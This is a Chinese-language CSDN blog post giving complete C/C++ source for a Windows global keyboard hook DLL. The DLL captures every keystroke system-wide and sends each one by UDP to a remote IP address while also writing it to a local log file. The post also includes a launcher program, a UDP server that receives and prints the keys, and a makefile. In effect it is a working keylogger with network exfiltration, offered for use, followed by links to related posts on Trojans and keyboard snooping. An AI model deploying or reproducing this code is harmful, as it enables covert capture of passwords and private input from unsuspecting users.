写一个钩子,控制远程主机按键

最新推荐文章于 2022-03-14 10:04:13 发布
最新推荐文章于 2022-03-14 10:04:13 发布
阅读量897 收藏
点赞数
分类专栏: Linux编程学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HelloNiGeSB/article/details/51935473
版权


dllmain.cpp

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "stdafx.h"

HMODULE hHookDll;// 定义一个全局的HMODULE供SetWindowsHookEx函数使用

BOOL APIENTRY DllMain( HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
	)
{
	hHookDll = hModule;

	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

hookdll.cpp

// hokdll.cpp : 定义 DLL 应用程序的导出函数。
//

#include "stdafx.h"
#include "pub.h"
#include <stdio.h>

/*dll使用说明
第一步:将hookdll.h和hookdll.lib加入到项目中
第二部:在项目cpp文件中加入
#include "hookdll.h"
#pragma comment(lib, "hookdll.lib")

第三步:在程序开始执行的时候调用
InstallLaunchEv()

第四步:程序常驻内存

第五步:程序退出的时候调用
UnInstallLaunchEv()

第六步:将hookdll.dll拷贝到项目编译后的可执行文件目录下
*/

HHOOK Hook;

LRESULT CALLBACK LauncherHook(int nCode, WPARAM wParam, LPARAM lParam);

void strerror(DWORD errno);
void savelog(const char *s);
void send_udp(const char *s);

extern HMODULE hHookDll;

__declspec(dllexport) void WINAPI UnInstallLaunchEv()// dll的导出函数
{
	UnhookWindowsHookEx(Hook);
}


__declspec(dllexport) void WINAPI InstallLaunchEv()// dll的导出函数
{
	//HMODULE hHookDll = LoadLibrary("hookdll");// 得到dll的模块句柄

	// Install keyboard hook to trap all keyboard messages
	Hook = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)LauncherHook, hHookDll, 0);// 为系统安装
	if (Hook == NULL)
	{
		strerror(GetLastError());
	}
}


LRESULT CALLBACK LauncherHook(int nCode, WPARAM wParam, LPARAM lParam)
{
	LRESULT Result = CallNextHookEx(Hook, nCode, wParam, lParam);

	if (nCode == HC_ACTION)
	{
		char buf[100];
		memset(buf, 0, sizeof(buf));
		sprintf(buf, "%u", wParam); // 参数wParam为键盘扫描码
		send_udp(buf);// 向远程主机发送udp消息

		memset(buf, 0, sizeof(buf));
		sprintf(buf, "%x\t%c\t%08x\n", wParam, wParam, lParam);// 将参数wParam,lParam值写到本地log
		savelog(buf); // 发送后写日志
	}
	return Result;
}

void send_udp(const char *s) // 想目标主机发送消息
{
	init_socket(); // 初始化socket
	SOCKET st = create_send_socket();
	send_work(st, "192.168.0.104", 8080, s);
	close_socket(st);
}

void savelog(const char *s)// 向D盘目录下的my.log文件写log信息
{
	FILE *p = fopen("E:\\my.log", "a+");// 在d盘目录下生成my.log文件
	fputs(s, p);
	fclose(p);
}

void strerror(DWORD errno)// 根据GetLastError()返回值,将错误信息转化为中文,写入my.log文件
{
	void *lpMsgBuf;
	FormatMessageA(
		FORMAT_MESSAGE_ALLOCATE_BUFFER |
		FORMAT_MESSAGE_FROM_SYSTEM |
		FORMAT_MESSAGE_IGNORE_INSERTS,
		NULL,
		errno,
		MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
		(char *)&lpMsgBuf,
		0,
		NULL
		);
	savelog((const char *)lpMsgBuf);
	LocalFree(lpMsgBuf);
}

pub.h 

#include <WinSock2.h>

int init_socket();// 初始化socket

int send_work(SOCKET st, const char *hostname, int port, const char *s);// 想hostname指定

void close_socket(SOCKET st);

SOCKET create_send_socket(); // 建立发送数据的udp socket

pub.cpp 

#include "stdafx.h"
#include <stdio.h>
#include "pub.h"

#pragma comment(lib, "Ws2_32.lib")

int init_socket()// 初始化socket
{
	WORD wVersionRequested;
	WSADATA wsaData;
	int err;
	wVersionRequested = MAKEWORD(1, 1);
	err = WSAStartup(wVersionRequested, &wsaData);
	if (err != 0)
	{
		return -1;
	}

	if (LOBYTE(wsaData.wVersion) != 1 || HIBYTE(wsaData.wVersion) != 1)
	{
		WSACleanup();
		return -1;
	}
	return 0;
}

void close_socket(SOCKET st)
{
	closesocket(st);
	WSACleanup();
}

SOCKET create_send_socket() // 建立发送数据的udp socket
{
	SOCKET st = socket(AF_INET, SOCK_DGRAM, 0);// 建立UDP socket
	if (st == 0)
	{
		return 0;// 如果建立socket失败,返回0
	}
	return st;// udp socket建立成功,返回socket描述符
}

int send_work(SOCKET st, const char *hostname, int port, const char *s)// 想hostname指定
{
	struct sockaddr_in addr;
	memset(&addr, 0, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_port = htons(port); // 指定port为要连接的端口号
	addr.sin_addr.s_addr = inet_addr(hostname);// 指定hostname为要连接的IP地址

	size_t rc = sendto(st, s, strlen(s), 0,
		(struct sockaddr *)&addr, sizeof(addr));// 想指定的IP发送消息
	return rc;
}

然后是建立一个win32引用程序来执行该钩子

testdll.cpp

// testdll.cpp : 定义应用程序的入口点。
//

#include "stdafx.h"
#include "testdll.h"
#include "hookdll.h"

#pragma comment(lib, "hookdll.lib")

int APIENTRY _tWinMain(HINSTANCE hInstance,
	HINSTANCE hPrevInstance,
	LPTSTR    lpCmdLine,
	int       nCmdShow)
{
	InstallLaunchEv();
	::Sleep(300000);
	UnInstallLaunchEv();
	return 0;
}
hookdll.h 

#ifdef __CPLUSPLUS
extern "C" {
#endif
	void WINAPI UnInstallLaunchEv();
	void WINAPI InstallLaunchEv();
#ifdef __CPLUSPLUS
}
#endif
唯一需要注意的是,如果操作系统是64位的,一定要编译64为的才能用,否则会出问题,我一开始就是老出问题,后来发现是这个原因

远程服务端需要注意的是编写的时候不要向Linux那样,因为他和Window是有区别的,还有就是这里钩子发送的是UDP消息,接受时候也要用UDP消息,我这边在本机上给本机发送的测试成功,还没有测在公网上的情况呢

下面是服务端代码

#ifdef WIN
#include <WinSock2.h>
#else
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <errno.h>
#include <string.h>
#define SOCKET int
#endif

#include <stdio.h>

#define BUFSIZE 5 //1024 * 256

int init_socket()
{
// 如果是windows,执行如下代码
#ifdef WIN
    WORD wVersionRequested;
    WSADATA wsaData;
    int err;
    wVersionRequested = MAKEWORD(1, 1);
    err = WSAStartup(wVersionRequested, &wsaData);
    if (err != 0)
    {
        return -1;
    }

    if (LOBYTE(wsaData.wVersion) != 1 || HIBYTE(wsaData.wVersion) != 1)
    {
        WSACleanup();
        return -1;
    }
#endif
    return 0;
}

SOCKET create_recv_socket(int port)
{
	if (init_socket() == -1)
	        return 0;
    SOCKET st = socket(AF_INET, SOCK_DGRAM, 0);// 建立UDP socket
    if (st == 0)
        return 0;

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    addr.sin_addr.s_addr = htonl(INADDR_ANY);
    if (bind(st, (struct sockaddr*)&addr, sizeof(addr)) == -1)
    {
        printf("bind failed %s\n", strerror(errno));
        return 0;
    }
    return st;// udp
}

// server端socket在port指定的断口上listen,接收来自client发送的文件
int recv_work(int port)
{

    SOCKET st_recv = create_recv_socket(port);// 建立接受数据的UDP Socket

    if (st_recv == 0) // 建立失败,函数返回
    {
        return 0;
    }

    char *buf = malloc(BUFSIZE);

#ifdef WIN
    int len = 0;
#else
    unsigned int len = 1;
#endif

    struct sockaddr_in client_addr;
    len = sizeof(client_addr);
    memset(&client_addr, 0, sizeof(client_addr));
    while (1)
    {
        memset(buf, 0, BUFSIZE);
        // 接收来自client的数据,客户端第一次发送的文件名
        printf("recvfrom start\n");
        size_t rc = recvfrom(st_recv, buf, BUFSIZE, 0, (struct sockaddr *)&client_addr, &len);
        printf("recvfrom end\n");
        if (rc <= 0)
        {
            printf("recv failed %s\n", strerror(errno));
        }
        else
        {
        	int tmp = atoi(buf);
        	printf("receiving %c\n", tmp);
        }
    }


    free(buf);
#ifdef WIN
    closesocket(st_recv);
    WSACleanup();
#else
    close(st_recv);
#endif
    return 1;
}


int main(int arg, char *args[])
{
    if (arg < 2)// 如果参数小于3个,main函数退出
    {
        printf("usage:server port\n");
        return EXIT_FAILURE;
    }

    int iport = atoi(args[1]);// 将第二个参数转化为端口号
    if (iport == 0)// 如果端口号为0,main函数退出
    {
        printf("port %d is invalid\n", iport);
        return EXIT_FAILURE;
    }

    printf("recv is begin\n");
    if (recv_work(iport) == 1)// 第一个参数为IP地址,第二个参数为端口号,第三个参数为需要发送的文件名
        printf("recv success\n");
    else
        printf("recv fail\n");
    return EXIT_FAILURE;
}
windows下的makefile文件,注意和Linux下的写法有不同地方 

.SUFFIXES:.c .o
CC=gcc
SERVERSRCS=abc.c
SERVEROBJS=$(SERVERSRCS:.c=.o)
SERVEREXEC=abc.exe

all: $(SERVEROBJS) $(CLIENTOBJS)
	$(CC) -static -o $(SERVEREXEC) $(SERVEROBJS) -lWs2_32
	@echo '----------------ok----------------'
.c.o:
	$(CC) -Wall -DWIN -o $@ -c $<
clean:
	rm -f $(SERVEROBJS)
	rm -f core*



小小哇牛
关注
专栏目录
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入、APC注入)
杨秀璋的专栏
06-25 1万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入、APC注入,案例包括键盘钩子、计算器远线程注入实现、APC注入等,希望对您有所帮助。
钩子机制实现键盘监听---键盘监听器
小黄鸭会发光 的博客
07-10 2090
钩子机制实现键盘监听—键盘监听器 Windows系统是建立在事件驱动的机制上的,说穿了就是整个系统都是通过消息的传递来实现的。而钩子是Windows系统中非常重要的系统接口,用它可以截获并处理送给其他应用程序的消息,来完成普通应用程序难以实现的功能。钩子的种类很多,每种钩子可以截获并处理相应的消息,如键盘钩子可以截获键盘消息,外壳钩子可以截取、启动和关闭应用程序的消息等。本文在VC6编程环境下
VB.Net远程控制编程实例[鼠标钩子、 键盘钩子]
rainbowsoftware
01-07 2148
功能描述:模拟鼠标事件的函数模型  设置光标到指定位置的函数模型 模拟键盘事件的函数模型命名空间:Lob.API转化后代码如下:    Imports System    Imports System.Runtime.InteropServices        Namespace Lob.API    Public Class Api                    
c语言怎么查表函数程序,程序里的钩子函数 谁能用c语言一个钩子函数的例子...
weixin_32214771的博客
05-18 338
1, 谁能用c语言一个钩子函数的例子例子:HWND hWnd = NULL; //定义成全局变量HHOOK hKeyboard;HHOOK hMouse;LRESULT CALLBACK MouseProc( int nCode, WPARAM wParam, LPARAM lparam ) // 鼠标钩子函数{return 1; // 返回非零值表示已经对当前消息进行了处理,这样系统就不会再将...
键盘钩子的实现
philip_liu的专栏
04-17 1750
程序用一个系统范围的远程钩子来实现监视所有键盘输入的功能,且程序中的文本框属性为只读,这样可更好的观察键盘钩子(WH_KEYBOARD)是否正确的截获了WM_KEYUP或WM_KEYDOWN消息。现在把键盘钩子当作远程钩子使用,即需要将钩子函数入到DLL中去,且其实含有共享的数据段。因为系统中只有DLL程序是可以插入到其他进程的地址空间中去。命名所钩子函数Dll文件名为HookDll;在HoolDll.h文件中声明需要导出的函数:extern "C" _declspec(dllexport) BOOL
Linux网络 - 数据包的接收过程 UDP为例
qq_44975864的博客
03-14 750
本文将介绍在Linux系统中,数据包是如何一步一步从网卡传到进程手中的。 本文只讨论以太网的物理网卡,不涉及虚拟设备,并且以一个UDP包的接收过程作为示例.
全局钩子详解
ccfxue的博客
05-03 6685
监控程序的实现       我们发现一些木马或其他病毒程序常常会将我们的键盘或鼠标的操作消息记录下来然后再将它发到他们指定的地方以实现监听.这种功能其他是利用了全局钩子将鼠标或键盘消息进行了截取,从而获得了操作的消息.要得到鼠标和键盘的控制权,我们要用SetWindowsHookEx这个函数:  HHOOK SetWindowsHookEx(     int idHook,        /
C#实现远程按键同步
c0411034的博客
04-20 2651
C#实现远程按键同步由于一个演示报告需要让两台机器的PPt播放同步,没有长驱等连接设备,就用C#通过TCP/IP协议走网络实现两台机器按键同步的功能。1.基本思路程序分为两个部分:主机和从机。主机主要功能:调用全局键盘钩子监听用户按键,建立TCP套接字,然后通过套接字向从机发送键盘指令。从机主要功能,与主机建立TCP连接,接收主机按键指令,并在本地模拟全局键盘信号。2.实现方案主要涉及的关键技术:
远程控制篇:模拟按键
zgqtxwd的专栏
04-30 547
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
利用HOOK技术实现DLL远程进程注入
热门推荐
泰瑞的博客
02-18 1万+
转载:http://blog.sina.com.cn/s/blog_651cccf70100tkvb.html上一篇博文《HOOK钩子教程》中,作者较为详细地讲述了如何使用HOOK,并举了一个例子:用HOOK拦截WM_CLOSE消息一次。    实际上,HOOK有多种用法,本文讲述其中一种:利用HOOK技术实现DLL远程进程注入。    远程进程注入,按照作者的理解,就是让其他进程替你并运行DLL...
易语言TCP_UDP封包拦截修改经典例子源码
10-05
TCP_UDP封包拦截接口\TCP通信.exe ...................\UDP通信.exe ...................\安装钩子DLL.exe ...................\mydll.dll ...................\mydll.e ...................\TCP通信.e ...................\UDP通信.e ...................\安装钩子DLL.e TCP_UDP封包拦截接口 以前玩网络游戏,很多人可能都有使用过WPE这个封包拦截软件,虽然现在WPE已时过境迁,但拦截替换网络封包的功能依然可以在某些抓包软件的身上看到。 本节我们自已也将设计一个类似于WPE那样的封包拦截替换功能的程序.该程序的封包拦截功能是在APIHOOK的基础上扩展而来的。 本节的源代码包里有两个软件,都是用易语编的. TCP通信.exe UDP通信.exe 本节要编的一个封包拦截软件,是需要用钩子EXE把一个钩子DLL文件插入目标进程中。对于拦截封包替换修改封包的功能全在DLL中实现 本节的下面的图中有些内容与源代码里有所不同,一切以源代码为准.
Window 下键盘钩子(监控键盘),并将监控信息发到服务端(UDP)
huangshanchun的专栏
03-13 1993
钩子的本质是一段用以处理系统消息的程序,通过系统调用,将其挂入系统。钩子的种类有很多,每种钩子可以截获并处理相应的消息,每当特定的消息发出,在到达目的窗口之前,钩子程序先行截获该消息、得到对此消息的控制权。此时在钩子函数中就可以对截获的消息进行加工处理,甚至可以强制结束消息的传递。   在本程序中我们需要捕获在任意窗口上的键盘输入,这就需要采用全局钩子以便拦截整个系统的消息,而全局钩子函数必须以
用python做一个木马_Python编简易木马程序
weixin_34405261的博客
01-30 6438
light · 2015/01/26 10:070x00 准备文章内容仅供学习研究、切勿用于非法用途!这次我们使用Python编一个具有键盘记录、截屏以及通信功能的简易木马。依然选用Sublime text2 +JEDI(python自动补全插件)来撸代码,安装配置JEDI插件可以参照这里: http://drops.wooyun.org/tips/4413首先准备好我们需要的依赖库,pytho...
远程控制主机
weixin_43893278的博客
08-03 1063
远程控制主机 通过远程控制实现对主机控制,在此处我们使用windowsXP远程控制windows2003。windowsXP的IP地址设置为10.1.1.1/24,windows2003的IP地址设置为10.1.1.2/24。 首先对需要被控制的windows2003做如下设置: 右键我的电脑-属性-启用这台计算机的远程桌面。 在这里我们创建一个用户,命令net user可以查看用户,通过命令net user noc 123 /add来创建一个名为noc,密码为123的用户,在之后我们将通过这个用户来
分享一个键盘钩子法,很实用
夜行者
09-29 6745
早就想一个键盘监听器了,学校的电子阅览室设了Administrator屏障,想装软件什么的很麻烦,因此想截获管理员密码。。     花了大概一个星期编一个,效果还不错,因此来分享一下。。      首先解释一下什么是键盘钩子:          钩子(Hook)是Windows消息处理机制中的一个监视点,应用程序可以在这里安装一个子程序(钩子函数)以监视指定窗口某种类型的消息,所监视
linux系统下,11款常见远程桌面控制软件
goingstudy的专栏
10-17 3803
远程控制能够给人们带来很多便利,本文介绍了11款常见的Linux系统下的远程桌面控制工具,总有一款能适合您。   一. Grdc 它是一个用GTK+编的,适用于gnome桌面环境的远程桌面访问软件。看图: 常见功能: 1.提供全屏,窗口化的远程控制。支持高分辨率下的窗口显示以及调整。 2.可浮动的工具栏 3.可抓取键盘 4.支持建立一个“常用访问列
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值